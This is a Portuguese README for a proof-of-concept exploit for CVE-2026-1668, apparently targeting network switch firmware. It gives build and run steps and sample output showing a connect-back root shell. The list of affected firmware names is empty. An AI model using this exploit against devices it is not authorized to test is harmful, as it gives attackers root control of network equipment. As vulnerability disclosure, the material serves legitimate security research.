
Exploit de prova de conceito para CVE-2026-1668.
Este é um exploit de prova de conceito para CVE-2026-1668. Destina-se exclusivamente a fins educacionais. Por favor, não tente explorar sistemas que você não possui ou para os quais não tem permissão explícita para explorar.
Esta prova de conceito foi desenvolvida contra uma imagem de firmware com o seguinte hash SHA256: 4b862b8dd7fde44fa57a39b35b562f21878dd6abb8e92ccd9cdef571ed60d544.
Nomes de firmwares conhecidos por corresponder a esse hash (lista não exaustiva):
Versões de firmware anteriores provavelmente também são vulneráveis, mas podem exigir pequenas alterações no payload do exploit.
Uma explicação de como o payload funciona pode ser encontrada neste artigo de blog.
Uma toolchain GCC Linux MIPS é necessária para compilar o payload. No Ubuntu 24.04, ela pode ser instalada com sudo apt install gcc-mips-linux-gnu.
$ make
Este exploit deve ser executado antes de o servidor HTTP atender à sua primeira requisição (ou seja, em um boot recém-iniciado).
$ ./run.sh
O script deve fornecer um shell de root. Caso contrário, o exploit falhou.
[*] Sending payload
HTTP/1.1 200 OK
Server: Web Switch
Connection: close
Content-Type: application/json
{"data":{"mByCtrl":0,"includePrivacyPolicy":0,"includeAutoCheck":1,"includeSshController":1},"errorcode":0,"success":true,"timeout":false}
[*] Connecting back to get a shell
/bin/sh: can't access tty; job control turned off
/etc #